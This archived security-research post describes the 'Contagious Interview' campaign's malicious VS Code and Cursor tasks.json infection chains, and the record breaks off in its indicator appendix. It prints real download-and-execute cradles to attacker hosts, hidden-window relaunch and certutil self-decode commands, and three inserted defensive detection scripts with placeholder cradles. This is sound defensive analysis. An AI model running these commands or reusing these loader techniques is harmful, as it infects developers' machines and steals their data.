{
	"id": "3842a616-378f-424e-97c6-83aa46af7eab",
	"created_at": "2026-04-06T00:17:52.975781Z",
	"updated_at": "2026-04-10T13:12:45.195422Z",
	"deleted_at": null,
	"sha1_hash": "3c5310b71d1e6948dd17e94a8b2708d4bb9e5743",
	"title": "Contagious Interview: Evolution of VS Code and Cursor Tasks Infection Chains - Part 1",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2923665,
	"plain_text": "Contagious Interview: Evolution of VS Code and Cursor Tasks Infection Chains - Part 1\r\nBy Abstract Security Threat Research Organization (ASTRO)\r\nPublished: 2026-03-02 · Archived: 2026-04-05 13:54:23 UTC\r\n2/27/2026 - Note: we have made revisions to this post to clarify findings and separate speculative analysis.\r\nSummary\r\nAbstract customers already have visibility into the behaviors described in this report.\r\nThe ASTRO team has been actively tracking Contagious Interview techniques that abuse task auto-execution in integrated development environments (IDEs) such as Microsoft Visual Studio Code (VS Code) and Cursor to deliver malware. Since our last report on the tasks infection vector, we have observed a number of new payload stagers using short URLs, GitHub Gists, Google Drive, and some interesting custom domains. We have also seen a resurgence of previously reported infection chains and tooling, now combined with the IDE tasks vector.\r\nFindings\r\nNew Payload Stagers\r\nIn the last report, we noted heavy use of Vercel URLs for payload staging referenced directly in tasks.json files, along with a handful of custom domains. While stagers hosted on Vercel continue to be prevalent (though many have been taken down), we have observed an increase in alternative staging servers used in the tasks commands and in later stages of the infection chains.\r\nThis GitHub Code search query returns a variety of new stagers while filtering out the Vercel URLs that would otherwise make up the majority of results:\r\npath:tasks.json runOn folderOpen (curl OR wget OR iwr) (cmd OR \"| sh\" OR \\\"bash\\\" OR \\\"powershell\\\" OR iex) NOT vercel\r\nGitHub Gists\r\nRecently, repos with tasks.json files were created with the same pattern of curl or other downloaders fetching scripts piped directly to a shell, but in these cases the scripts were hosted in GitHub Gists. 
This query returns 2 repos with this pattern, each targeting both VS Code and Cursor users:\r\npath:tasks.json runOn folderOpen \"gist.githubusercontent\"\r\nhttps://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains\r\nPage 1 of 18\r\nHere is a sample command run from bash -c in Wisepanda-bot-main/.cursor/tasks.json:\r\ncurl -sL https://gist[.]githubusercontent[.]com/cuda-toolkit/0959deda4982736d1c1647cff354c665/raw/metal_pytorch_sim_v2.3.0.sh | bash\r\nThese files also have a variation for Windows that uses PowerShell instead of piping to cmd as previously seen, like so:\r\niex(iwr 'https://gist[.]githubusercontent[.]com/cuda-toolkit/936835c7a98d3b223970a5d2ed63fc97/raw/cuda_toolkit_sim_v12.4.ps1' -UseBasicParsing)\r\nThe gist user cuda-toolkit and script file names like cuda_toolkit_sim_v12.4.ps1 and metal_pytorch_sim_v2.3.0.sh are an attempt to masquerade as NVIDIA software, a tactic that Contagious Interview actors are known to use. This may be a recurring theme due to the intended campaign targets, typically software developers in DeFi and other cryptocurrency-related industries, who are more likely to use high-performance GPUs.\r\nThe Gist-hosted scripts download next-stage payloads from the domain camdriver[.]pro, another attempt at mimicking hardware driver software, this time by posing as camera drivers (with Realtek-themed file names). Depending on the target platform, the payload URLs are formatted like https://camdriver[.]pro/realtekwin.update?r=7205d529-ff14-4dcf-965b-29d500663a75 or https://camdriver[.]pro/realtekmac.sh?r=7205d529-ff14-4dcf-965b-29d500663a75 and drop ZIP files that lead to malware installation downstream.\r\nWhile these gists have since been deleted, these few cases might indicate future continued use of gist[.]githubusercontent[.]com for payload URLs in tasks commands. 
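The GitHub search queries above only find files that GitHub has indexed. To triage a checked-out repository offline, the following Python script, an added example that is not code from the original post or from Abstract Security, parses a tasks.json and flags tasks whose command (including the per-OS windows/osx/linux variants) contains a download utility, a pipe into a shell or iex, a staging host such as gist.githubusercontent.com or short.gy, PowerShell bypass/hidden flags, or the whitespace padding used to push commands off-screen, and records whether the task auto-runs on folderOpen. The sample tasks.json is constructed for the example; the gist ID, the short URL and the label are placeholders, not indicators from this report.

```python
import json
import re

# Patterns for the cradle shapes seen in the malicious tasks files described in this post.
DOWNLOADERS = re.compile('\\b(curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod)\\b', re.I)
PIPED_EXEC = re.compile('\\|\\s*(sh|bash|zsh|cmd|powershell|pwsh|iex|invoke-expression)\\b|\\biex\\s*\\(', re.I)
PS_FLAGS = re.compile('-(executionpolicy\\s+bypass|ep\\s+bypass|windowstyle\\s+hidden|w\\s+hidden)', re.I)
PADDING = re.compile('\\s{40,}\\S')          # long runs of spaces that push the real command off-screen
STAGING_HOSTS = ('gist.githubusercontent.com', 'short.gy', 'vercel.app',
                 'drive.google.com', 'drive.usercontent.google.com')


def _command_strings(task):
    '''Yield (platform, command line) for the default and per-OS sections of one task.'''
    for platform in ('default', 'windows', 'osx', 'linux'):
        section = task if platform == 'default' else task.get(platform)
        if not isinstance(section, dict):
            continue
        parts = []
        if isinstance(section.get('command'), str):
            parts.append(section['command'])
        parts.extend(a for a in section.get('args', []) if isinstance(a, str))
        if parts:
            yield platform, ' '.join(parts)


def scan_tasks_json(text):
    '''Return findings for tasks whose command looks like a download cradle.

    Each finding records the task label, the platform section that matched, whether the task
    auto-runs on folder open (runOptions.runOn == folderOpen) and the reasons it was flagged.'''
    data = json.loads(text)
    findings = []
    for task in data.get('tasks', []):
        if not isinstance(task, dict):
            continue
        auto_run = (task.get('runOptions') or {}).get('runOn') == 'folderOpen'
        hidden = (task.get('presentation') or {}).get('reveal') == 'never'
        for platform, cmdline in _command_strings(task):
            reasons = []
            if DOWNLOADERS.search(cmdline):
                reasons.append('download utility')
            if PIPED_EXEC.search(cmdline):
                reasons.append('piped or inline execution')
            hosts = [h for h in STAGING_HOSTS if h in cmdline.lower()]
            if hosts:
                reasons.append('staging host: ' + ', '.join(hosts))
            if PS_FLAGS.search(cmdline):
                reasons.append('PowerShell policy bypass or hidden window')
            if PADDING.search(cmdline):
                reasons.append('whitespace padding')
            if not reasons:
                continue
            if hidden:
                reasons.append('terminal output hidden (reveal: never)')
            findings.append({'label': task.get('label'), 'platform': platform,
                             'auto_run': auto_run, 'reasons': reasons})
    return findings


# Constructed sample in the shape of the malicious files described above; the gist ID and the
# short URL are placeholders, not indicators from the report.
PAD = ' ' * 300
SAMPLE_TASKS_JSON = json.dumps({
    'version': '2.0.0',
    'tasks': [
        {
            'label': 'env',
            'type': 'shell',
            'command': 'bash',
            'args': ['-c', PAD + 'curl -sL https://gist.githubusercontent.com/example-user/0123456789abcdef/raw/setup.sh | bash'],
            'windows': {
                'command': 'powershell',
                'args': ['-ExecutionPolicy', 'Bypass', '-WindowStyle', 'Hidden', '-Command',
                         'iex(iwr https://short.gy/example -UseBasicParsing)'],
            },
            'runOptions': {'runOn': 'folderOpen'},
            'presentation': {'reveal': 'never'},
        },
        {'label': 'build', 'type': 'shell', 'command': 'npm run build', 'group': 'build'},
    ],
})

if __name__ == '__main__':
    for finding in scan_tasks_json(SAMPLE_TASKS_JSON):
        print(finding)
```

Real tasks.json files are JSONC and may carry comments or trailing commas, which json.loads rejects, so strip comments or use a JSONC-aware parser before scanning in bulk. Matching is deliberately broad: a task run by hand that downloads a dependency is also reported, with auto_run set to False; the folderOpen flag is what turns a finding into a priority, since that is the task that fires when the victim merely opens the cloned repo.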
The actual scripts we pulled before deletion, and their subsequent chains, eventually lead to deployment of the Go/Python backdoors dubbed WeaselStore by ESET (WeLiveSecurity). These previously analyzed backdoors represent a combination of older, documented Contagious Interview TTPs with the more recent tasks.json infection vector. More on this will be covered in Part 2 of this report.\r\nURL Shorteners\r\nWe have also seen the use of URLs shortened by short[.]gy to host the scripts downloaded and executed in tasks files. Most if not all of these URLs resolve to the Vercel domain josehub88[.]vercel[.]app, suggesting that the actors started using URL shorteners as a means to reduce their footprint of Vercel servers, perhaps due to the extensive reporting around this aspect.\r\nThe search query for this is straightforward. As of this reporting, 22 files containing these shortened URLs are returned.\r\npath:tasks.json runOn folderOpen \"short.gy\"\r\nNotably, many of these files feature whitespace padding of the malicious commands to move them off-screen from view. This cheap evasion technique was seen in our previous report from late January.\r\nGoogle Drive\r\nThe Contagious Interview actors have published and continue to publish malicious Node Package Manager (npm) packages, many of which have been identified by the DPRK npm packages tracker. 
One package in particular, \"eslint-validator\" (created by user lincoln0809), can be found in the package.json dependencies of 3 GitHub repos using this query:\r\npath:package.json \"\\\"eslint-validator\\\"\"\r\nMalicious package dependencies in repositories are a common pattern, but interestingly, in the case of this package, it runs content fetched from the Google Drive URL https://drive[.]google[.]com/file/d/16AaeeVhqj4Q6FlJIDMgdWASJvq7w00Yc/view?usp=sharing, found in core.js. The containing file itself is executed using node via an install script in the package's package.json.\r\nThe code for handling the content download from the Drive link can be found in googleDrive.js. It performs a GET request using the fetch API and handles virus-scan warning pages by falling back to an alternative URL endpoint in the format https://drive[.]usercontent[.]google[.]com/download?id=${fileId}&export=download&confirm=t.\r\nIt is worth noting that the code to download and execute content from Google Drive was not present in the initial version of the \"eslint-validator\" package, and was added in a later version.\r\nThe Google Drive link hosts inject-simple.min0.js (4.5k), which contains heavily obfuscated JavaScript with previously seen patterns suggesting a ChainedDown (JADESNOW) downloader component.\r\nThe use of Google Drive as a stager was also recently reported by kmsec.uk.\r\n(Speculative) A Copycat Actor?\r\nThis section has been adjusted to clarify that the following finding, while sharing techniques and patterns with previously 
documented Contagious Interview infection chains, may be a copycat or a test by an unrelated actor and therefore is not confirmed to be part of the same campaign. This is largely due to the discovery that the chain results in Akira Stealer, a malware family not known to be used by Contagious Interview actors.\r\nPossibly Unrelated Chain Shares Similar Techniques\r\nIn analyzing suspicious tasks.json files across GitHub, we encountered a tasks file in the repo adadsws/shannon, which is a malicious fork of the Keygraph Shannon AI penetration testing framework. The tasks file executes the following command, targeting Windows only:\r\ncurl https://nomgwenya[.]co[.]za/js/settings?win=32 | cmd\r\nThis downloads and executes a batch script captured in this URLScan result and shown below.\r\nThe next stage is another batch script from https://nomgwenya[.]co[.]za/js/bootstrap?win=32, written to the file %USERPROFILE%\\.vscode\\vscode-bootstrap.cmd. The full content of this script can be found in this URLScan result.\r\nThe script begins by re-launching itself in a hidden window if it was not already started with a _restarted argument:\r\nif \"%~1\" neq \"_restarted\" powershell -WindowStyle Hidden -Command \"Start-Process -FilePath cmd.exe -ArgumentList '/c \\\"%~f0\\\" _restarted' -WindowStyle Hidden\" & exit /b\r\nThe script then obtains a Node.js runtime needed to execute an embedded JavaScript payload. It checks for a global install via where node and, if not found, downloads the latest Node.js MSI from nodejs.org and extracts it portably with msiexec /a (an administrative install, which unpacks the files without registering the product). 
The MSI file is then deleted.\r\nOnce Node.js is available, the script changes its working directory to %USERPROFILE%\\.vscode, positioning its subsequent file operations alongside legitimate VS Code configuration files.\r\nUp until this point, a number of patterns coincide with previously observed Contagious Interview techniques:\r\nThe repo adadsws/shannon README is modified with LLM-generated content.\r\nThe repo contains a .vscode/tasks.json backdoor that runs on folder open.\r\nThe tasks file contains the label \"env\", which has been observed in multiple Contagious Interview-linked tasks files.\r\nThe task command is a download cradle piped to cmd and has a URL containing /settings with a ?win=32 parameter.\r\nThe loaders have been used in Contagious Interview before, such as in the first- and second-stage batch files of a previously seen tasks.json chain that leveraged TxDataHiding. These contain similar logic for hidden-window re-launch and portable Node.js usage.\r\nHowever...\r\nA Twist in this Loader Has an Unexpected Outcome\r\nWhile the loaders seem near-identical to those used in Contagious Interview, they differ in the execution of the third stage, which in Contagious Interview infection chains is often Base64-encoded JavaScript decoded and run directly using Node.js.\r\nInterestingly, in this case, at the bottom of the batch file is a block of Base64-encoded JavaScript wrapped in PEM certificate headers (\"-----BEGIN CERTIFICATE-----\" ... \"-----END CERTIFICATE-----\"), masquerading as an embedded certificate. The script uses certutil, a commonly abused Windows utility, to decode itself:\r\ncertutil -f -decode \"%~f0\" \"%TMP_JS%\" >nul 2>&1\r\nThe %~f0 reference expands to the full path of the currently executing batch file. certutil -decode recognizes the PEM headers in the file and extracts the Base64 content between them, ignoring the batch commands above the block, and writes the decoded JavaScript to a randomly named temp file at %TEMP%\\script_%RANDOM%.mjs. 
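To triage such a loader without running it, the following Python helper, added here and not part of the original post or of the malware, does what the certutil invocation does: it finds the PEM-wrapped block, ignores the batch commands above it, and Base64-decodes the body. It also recognises the %~f0 self-reference and pulls out the argument the loader hands to node, which the next stage forwards through an environment variable. The batch file in the example is a constructed stand-in whose payload is a harmless one-liner, the TMP_JS variable name is taken from the snippet above, and the encoded argument is made up.

```python
import base64
import re
import textwrap

PEM_BLOCK = re.compile('-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----', re.S)
SELF_DECODE = re.compile('certutil\\s+(?:-f\\s+)?-decode\\s+\\S{0,1}%~f0', re.I)


def extract_pem_payload(batch_text):
    '''Split a self-decoding batch file into (batch commands, decoded payload bytes).

    This reproduces the relevant behaviour of certutil -decode: everything outside the
    BEGIN/END CERTIFICATE lines is ignored and the line-wrapped Base64 between them is joined
    and decoded. The commands above the block therefore never disturb the decode, which is
    exactly what lets the batch file carry its own payload. Only the first block is used.'''
    match = PEM_BLOCK.search(batch_text)
    if match is None:
        return batch_text, None
    body = ''.join(match.group(1).split())      # drop the 64-column line wrapping
    return batch_text[:match.start()], base64.b64decode(body, validate=True)


def is_self_decoding(batch_text):
    '''True when the batch file passes itself (%~f0) to certutil -decode.'''
    return SELF_DECODE.search(batch_text) is not None


def node_argument(batch_commands):
    '''Return the argument the loader passes to the decoded script (what process.argv[2] sees).

    Assumes the loader line has the shape: node <script path> <encoded argument>.'''
    for line in batch_commands.splitlines():
        tokens = line.split()
        if len(tokens) >= 3 and tokens[0].lower() == 'node':
            return tokens[2]
    return None


# Constructed stand-in for the loader described above. The embedded payload is a harmless
# one-liner, not the attacker's bytecode VM, and the argument is a made-up value.
EMBEDDED_JS = 'console.log(process.argv[2]);\n'
ENCODED_ARG = 'c2FtcGxlLWFyZ3VtZW50'
SAMPLE_BATCH = (
    '@echo off\r\n'
    'set TMP_JS=%TEMP%\\script_%RANDOM%.mjs\r\n'
    'certutil -f -decode %~f0 %TMP_JS% >nul 2>&1\r\n'
    'node %TMP_JS% ' + ENCODED_ARG + '\r\n'
    'del %TMP_JS%\r\n'
    'exit /b\r\n'
    '-----BEGIN CERTIFICATE-----\r\n'
    + '\r\n'.join(textwrap.wrap(base64.b64encode(EMBEDDED_JS.encode()).decode(), 64))
    + '\r\n-----END CERTIFICATE-----\r\n'
)

if __name__ == '__main__':
    commands, payload = extract_pem_payload(SAMPLE_BATCH)
    print('self-decoding:', is_self_decoding(commands), 'argument:', node_argument(commands))
    print(payload.decode())
```

The decoded bytes are handed back rather than written to disk so the triage step can hash them, grep the string table, or feed them to a sandbox without ever giving the real loader a runtime. The same function applies to any certutil-decodable carrier, since the PEM header is what certutil keys on, not the file extension.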
The .mjs extension makes Node.js treat the file as an ES module, which the payload requires based on its imports.\r\nThe decoded script is then executed with the previously obtained Node.js runtime. A long encoded string is passed as a command-line argument which, as we'll see shortly, is forwarded to a later stage via an environment variable. After execution, the temp file is deleted.\r\nUpon decoding the JavaScript payload we're greeted with an anti-debugging trick using (function(){}).constructor(\"debugger\")() wrapped in a try/catch.\r\nThe rest of the payload is a custom stack-based bytecode VM. Two encrypted blobs are decrypted with a rolling XOR cipher, one as bytecode and the other as a string table. The VM implements ~30 opcodes and makes Node.js modules available to the bytecode as numbered registers.\r\nPossibly Unrelated Chain Deploys Akira Stealer\r\nDecrypting the string table and disassembling the bytecode unearths some strings that reveal the next stage:\r\nExtracted strings\r\nhxxps://postprocesser[.]com/.well-known/pki-validation/go/python3.zip\r\npythonw.exe\r\nexec.py\r\nspawn\r\ndetached\r\nREALTEKAUDIO\r\nPROCNAME\r\nThe bytecode downloads python3.zip from hxxps://postprocesser[.]com/.well-known/pki-validation/go/python3.zip to the system temp directory, then extracts the ZIP and spawns the extracted pythonw.exe (the windowless Python interpreter) with exec.py as a detached process. 
Reconstructed from the bytecode, the spawn call is equivalent to:\r\nchild_process.spawn(pythonw_path, [exec_py_path], {\r\n  detached: true,\r\n  stdio: 'ignore',\r\n  env: { ...process.env, REALTEKAUDIO: process.argv[2], PROCNAME: \"Main\" }\r\n});\r\nThe REALTEKAUDIO environment variable carries the encoded command-line argument from the batch script through to the Python payload, under a name masquerading as Realtek audio software. Additionally, the path .well-known/pki-validation/ in the download URL mimics a location commonly used for domain-validation file challenges when issuing TLS certificates.\r\nThe Python payload is protected with PyArmor and was compiled just before this report's release.\r\nRemoving the PyArmor protection and analyzing the underlying Python code reveals a Go-based variant of Akira Stealer, a commodity malware-as-a-service (MaaS) infostealer that exfiltrates user data from browsers, cryptocurrency wallets, chat applications, and system files.\r\nThe associated indicators have been reported by Elastic Security Labs. In January 2026, a similar distribution of Akira Stealer was reported masquerading as a custom tool on GitHub.\r\nThe discovery of Akira Stealer complicates attribution for this particular infection chain. While the earlier stages share many techniques and patterns with previously documented Contagious Interview chains, Akira Stealer is not, to our knowledge, used by Contagious Interview actors. It is possible that this is a separate actor copying techniques and swapping in a different final stage. As such, this chain's attribution remains uncertain, but its details are included in this post due to the shared techniques and infection vector.\r\nDetection Opportunities\r\nVS Code/Cursor child process activity. 
Monitor for IDEs spawning shell processes that run curl, wget, PowerShell download commands, or similar utilities (optionally including piped execution) shortly after the IDE process starts.\r\nGitHub Gist URLs in IDE task files. Monitor for gist.githubusercontent.com URLs in .vscode/tasks.json or .cursor/tasks.json files, particularly combined with curl, wget, iwr, or piped execution.\r\nURL shorteners in IDE task files. Flag tasks.json files containing shortened URLs from services like short[.]gy. Shorteners obscure the destination and have no legitimate use in IDE task configurations.\r\nPowerShell suspicious arguments in IDE task files. tasks.json commands invoking PowerShell with -ExecutionPolicy Bypass combined with -WindowStyle Hidden and iex / iwr.\r\nGoogle Drive downloads from non-browser processes. Alert on drive.google.com or drive.usercontent.google.com requests initiated by non-browser processes like node or npm. Google Drive URLs in the format https://drive[.]usercontent[.]google[.]com/download?id=${fileId}&export=download&confirm=t are particularly suspicious, as they indicate attempts to bypass virus-scan warning pages.\r\nDownloaded content piped to shell. Most of the malicious tasks.json commands we have observed download and immediately execute scripts. Monitor for download utilities like curl or wget piped directly to shell commands.\r\nBatch scripts written to the .vscode directory. The user .vscode directory normally contains configuration files. Creation of .cmd or .bat files in %USERPROFILE%\\.vscode\\ is unusual and may indicate malicious activity.\r\nConsole clearing around payload execution. A first-stage batch script in one of the infection chains uses cls commands before and after executing the downloaded loader to clear evidence from the console window. 
While cls alone is benign, its overuse, especially surrounding download utilities or script execution in batch files, is suspicious.\r\nHidden window re-launch with sentinel argument. Detect cmd.exe processes that spawn powershell -WindowStyle Hidden, which in turn uses Start-Process to launch another cmd.exe with a hidden window, particularly when the command line includes a re-launch sentinel argument (e.g., _restarted). This double-hidden pattern is distinctive and unlikely in legitimate use.\r\nPortable Node.js extraction via msiexec. msiexec /a performing an administrative install of a Node.js MSI to a user-writable directory such as .vscode or %TEMP% is unusual.\r\nThe following detections are based on an infection chain with shared techniques but an unconfirmed connection to Contagious Interview.\r\ncertutil decoding batch scripts. certutil -f -decode where the source file is a .cmd or .bat, especially when the source is %~f0 (self-reference). Legitimate certutil usage targets certificate files or encoded data files, not scripts.\r\nNode.js executing temporary .mjs files. node.exe executing .mjs files from %TEMP% with randomized filenames matching patterns like script_%RANDOM%.mjs.\r\npythonw.exe spawned from temp directories. pythonw.exe running from %TEMP%\\python3\\ or similar temp subdirectories, especially as a detached process. This can indicate a dropped Python runtime rather than a standard installation.\r\nNode.js spawning Python with suspicious environment variables. Process chain where node.exe spawns pythonw.exe. While this could be legitimate activity, it warrants closer inspection when paired with other indicators, such as the REALTEKAUDIO and PROCNAME environment variables seen in this chain.\r\nNetwork requests to .well-known paths returning unusual content. HTTP requests to .well-known/pki-validation/ paths that return ZIP files or other unexpected content. 
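Several of the process-level detections listed above can be expressed as rules over process-creation telemetry. The following Python script is an added example, not detection content from Abstract Security or from the original post: it runs the rules over a constructed set of Sysmon-style events (pid, ppid, image, cmdline) that replays the chain described in this post, namely the IDE spawning a shell that runs a cradle, the hidden re-launch via PowerShell with the _restarted sentinel, msiexec /a extracting Node.js into .vscode, certutil decoding a .cmd, node running a %TEMP%\\script_*.mjs file, and node spawning pythonw.exe from %TEMP%, plus one benign node.exe process started from the same IDE. The PIDs, the user name dev, the stager.invalid host and the field names are invented for the example, and the user-writable path check assumes a default Windows profile layout.

```python
import re

SHELLS = {'cmd.exe', 'powershell.exe', 'pwsh.exe', 'bash.exe', 'sh.exe'}
IDE_IMAGES = {'code.exe', 'cursor.exe'}
DOWNLOADERS = re.compile('\\b(curl|wget|iwr|irm|invoke-webrequest|invoke-restmethod)\\b')
TEMP_MJS = re.compile('/temp/script_[0-9]+\\.mjs\\b')


def _norm(text):
    '''Lower-case and use forward slashes so the rules below stay readable.'''
    return text.lower().replace('\\', '/')


def _basename(path):
    return _norm(path).rsplit('/', 1)[-1]


def _user_writable(text):
    '''Locations from the chain that a standard user can write to (assumes a default profile layout).'''
    t = _norm(text)
    return '/users/' in t and ('/.vscode/' in t or '/appdata/local/temp/' in t)


def detect(events):
    '''Run the rules over a list of process-creation events and return (rule, pid) hits in event order.

    Each event needs pid, ppid, image and cmdline; parents are resolved by pid within the list.'''
    by_pid = {e['pid']: e for e in events}
    hits = []
    for e in events:
        img, cmd = _basename(e['image']), _norm(e['cmdline'])
        tokens = cmd.split()
        parent = by_pid.get(e['ppid'])
        pimg = _basename(parent['image']) if parent else ''

        # IDE spawning a shell whose command line downloads and immediately executes content
        if pimg in IDE_IMAGES and img in SHELLS and DOWNLOADERS.search(cmd) and ('|' in cmd or 'iex' in cmd):
            hits.append(('ide_download_cradle', e['pid']))

        # cmd.exe -> powershell -WindowStyle Hidden -> Start-Process cmd.exe hidden; sentinel argument is a bonus
        if (img == 'powershell.exe' and pimg == 'cmd.exe' and 'windowstyle hidden' in cmd
                and 'start-process' in cmd and 'cmd.exe' in cmd):
            hits.append(('hidden_relaunch' + ('_with_sentinel' if '_restarted' in cmd else ''), e['pid']))

        # certutil -decode with a batch file (or the %~f0 self-reference) as the source
        if img == 'certutil.exe' and '-decode' in tokens:
            i = tokens.index('-decode') + 1
            src = tokens[i] if i < len(tokens) else ''
            if src.endswith(('.cmd', '.bat')) or '%~f0' in src:
                hits.append(('certutil_decode_batch', e['pid']))

        # msiexec /a (administrative install) of a Node.js MSI involving a user-writable directory
        if (img == 'msiexec.exe' and '/a' in tokens and _user_writable(cmd)
                and any(t.endswith('.msi') and 'node' in _basename(t) for t in tokens)):
            hits.append(('msiexec_portable_node', e['pid']))

        # node.exe running a randomly named .mjs file out of %TEMP%
        if img == 'node.exe' and TEMP_MJS.search(cmd):
            hits.append(('node_temp_mjs', e['pid']))

        # pythonw.exe executing from a temp directory, and node.exe as its parent
        if img == 'pythonw.exe':
            if '/appdata/local/temp/' in _norm(e['image']):
                hits.append(('pythonw_from_temp', e['pid']))
            if pimg == 'node.exe':
                hits.append(('node_spawns_pythonw', e['pid']))
    return hits


# Constructed Sysmon-style events replaying the chain; PIDs, user name, host and paths are invented.
EVENTS = [
    {'pid': 100, 'ppid': 1, 'image': 'C:\\Users\\dev\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe',
     'cmdline': 'Code.exe C:\\src\\shannon'},
    {'pid': 101, 'ppid': 100, 'image': 'C:\\Windows\\System32\\cmd.exe',
     'cmdline': 'cmd.exe /d /c curl https://stager.invalid/js/settings?win=32 | cmd'},
    {'pid': 102, 'ppid': 101, 'image': 'C:\\Windows\\System32\\cmd.exe',
     'cmdline': 'cmd.exe /c C:\\Users\\dev\\.vscode\\vscode-bootstrap.cmd'},
    {'pid': 103, 'ppid': 102, 'image': 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
     'cmdline': 'powershell -WindowStyle Hidden -Command Start-Process -FilePath cmd.exe '
                '-ArgumentList /c C:\\Users\\dev\\.vscode\\vscode-bootstrap.cmd _restarted -WindowStyle Hidden'},
    {'pid': 104, 'ppid': 103, 'image': 'C:\\Windows\\System32\\cmd.exe',
     'cmdline': 'cmd.exe /c C:\\Users\\dev\\.vscode\\vscode-bootstrap.cmd _restarted'},
    {'pid': 105, 'ppid': 104, 'image': 'C:\\Windows\\System32\\msiexec.exe',
     'cmdline': 'msiexec /a C:\\Users\\dev\\.vscode\\node.msi /qn TARGETDIR=C:\\Users\\dev\\.vscode\\node'},
    {'pid': 106, 'ppid': 104, 'image': 'C:\\Windows\\System32\\certutil.exe',
     'cmdline': 'certutil -f -decode C:\\Users\\dev\\.vscode\\vscode-bootstrap.cmd C:\\Users\\dev\\AppData\\Local\\Temp\\script_23781.mjs'},
    {'pid': 107, 'ppid': 104, 'image': 'C:\\Users\\dev\\.vscode\\node\\node.exe',
     'cmdline': 'node.exe C:\\Users\\dev\\AppData\\Local\\Temp\\script_23781.mjs c2FtcGxlLWFyZ3VtZW50'},
    {'pid': 108, 'ppid': 107, 'image': 'C:\\Users\\dev\\AppData\\Local\\Temp\\python3\\pythonw.exe',
     'cmdline': 'pythonw.exe C:\\Users\\dev\\AppData\\Local\\Temp\\python3\\exec.py'},
    {'pid': 109, 'ppid': 100, 'image': 'C:\\Program Files\\nodejs\\node.exe',
     'cmdline': 'node.exe C:\\src\\shannon\\server.js'},   # benign: a project script run from the IDE
]

if __name__ == '__main__':
    for rule, pid in detect(EVENTS):
        print(pid, rule)
```

The rules are written against normalized command lines rather than exact strings so that quoting, casing and drive letters do not matter; the trade-off is that a quoted certutil source path keeps its quote characters in the token, which is why the .cmd/.bat check uses endswith rather than an equality test. The benign node.exe process from Program Files produces no hit, which is the point of keying the node rules on the %TEMP% path and on the pythonw.exe child rather than on node.exe itself.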
This path is not commonly intended for file hosting.\r\nConclusion\r\nContagious Interview actors continue to evolve their infrastructure and techniques. The shift toward GitHub Gists, URL shorteners, and Google Drive for payload staging suggests the actors are actively adapting to community reporting and platform takedowns. In Part 2, we will take a closer look at the infection chains covered in this report, among other findings.\r\nAppendix\r\nGitHub Search Queries\r\nPurpose | Query\r\nTasks with non-Vercel stagers | path:tasks.json runOn folderOpen (curl OR wget OR iwr) (cmd OR \"| sh\" OR \\\"bash\\\" OR \\\"powershell\\\" OR iex) NOT vercel\r\nTasks referencing GitHub Gists | path:tasks.json runOn folderOpen \"gist.githubusercontent\"\r\nTasks using URL shortener | path:tasks.json runOn folderOpen \"short.gy\"\r\nRepos with eslint-validator dependency | path:package.json \"\\\"eslint-validator\\\"\"\r\nIndicators\r\nDomains\r\nDomain | Description\r\nshort[.]gy | URL shortener used to hide Vercel stagers\r\njosehub88[.]vercel[.]app | short[.]gy redirect destination\r\ncamdriver[.]pro | Payload delivery in the GitHub Gist chains\r\nnomgwenya[.]co[.]za | (Possibly unrelated to campaign) Batch script delivery\r\npostprocesser[.]com | (Possibly unrelated to campaign) PyArmor-protected Python malware delivery\r\nURLs\r\nURL | Description\r\nhxxps://gist[.]githubusercontent[.]com/cuda-toolkit/0959deda4982736d1c1647cff354c665/raw/metal_pytorch_sim_v2.3.0.sh | Gist-hosted stager (macOS/Linux)\r\nhxxps://gist[.]githubusercontent[.]com/cuda-toolkit/4ece7a2e99311a4aa384c24733b7a41b/raw/metal_pytorch_sim_v2.3.0.sh | Gist-hosted stager (macOS/Linux)\r\nhxxps://gist[.]githubusercontent[.]com/cuda-toolkit/936835c7a98d3b223970a5d2ed63fc97/raw/cuda_toolkit_sim_v12.4.ps1 | Gist-hosted stager (Windows)\r\nhxxps://gist[.]githubusercontent[.]com/cuda-toolkit/384410c927451dbada9ecb0072851198/raw/cuda_toolkit_sim_v12.4.ps1 | Gist-hosted stager (Windows)\r\nhxxps://camdriver[.]pro/realtekwin.update?r=7205d529-ff14-4dcf-965b-29d500663a75 | Next-stage Windows payload URL in Gist-based stagers\r\nhxxps://camdriver[.]pro/realtekwin.update?r=ffa752c6-84e9-4bb9-b3c8-a3ab09cbcbe6 | Next-stage Windows payload URL in Gist-based stagers\r\nhxxps://camdriver[.]pro/realtekmac.sh?r=7205d529-ff14-4dcf-965b-29d500663a75 | Next-stage *nix payload URL in Gist-based stagers\r\nhxxps://drive[.]google[.]com/file/d/16AaeeVhqj4Q6FlJIDMgdWASJvq7w00Yc/view?usp=sharing | Google Drive-hosted inject-simple.min0.js (ChainedDown aka JADESNOW)\r\nhxxps://nomgwenya[.]co[.]za/js/settings?win=32 | (Possibly unrelated to campaign) First-stage batch script\r\nhxxps://nomgwenya[.]co[.]za/js/bootstrap?win=32 | (Possibly unrelated to campaign) Second-stage loader (vscode-bootstrap.cmd)\r\nhxxps://postprocesser[.]com/.well-known/pki-validation/go/python3.zip | (Possibly unrelated to campaign) Bundled Python runtime and PyArmor payload\r\nHashes\r\nSHA-256 Hash | Description\r\n2a7e7b76a3e8070410adce9b6a2b9cf112687922792c91be563c20fbf6a4a82f | Google Drive-hosted inject-simple.min0.js (ChainedDown aka JADESNOW)\r\n6d9379e365a4da282531d7f234c69eefa48567c01ba173b462e907a1ddfc71b2 | (Possibly unrelated to campaign) Bundled Python runtime and PyArmor payload\r\nFile Paths and Artifacts\r\nArtifact | Description\r\n%USERPROFILE%\\.vscode\\vscode-bootstrap.cmd | (Possibly unrelated to campaign) Second-stage loader written to the .vscode directory\r\n%TEMP%\\script_*.mjs | (Possibly unrelated to campaign) certutil-decoded JavaScript payload\r\n%TEMP%\\py.zip | (Possibly unrelated to campaign) ZIP archive containing Python runtime and PyArmor payload\r\n%TEMP%\\python3\\exec.py | (Possibly unrelated to campaign) PyArmor-protected Python payload\r\nREALTEKAUDIO | (Possibly unrelated to campaign) Environment variable passing encoded data to the Python stage\r\nGitHub Repositories\r\nRepository | 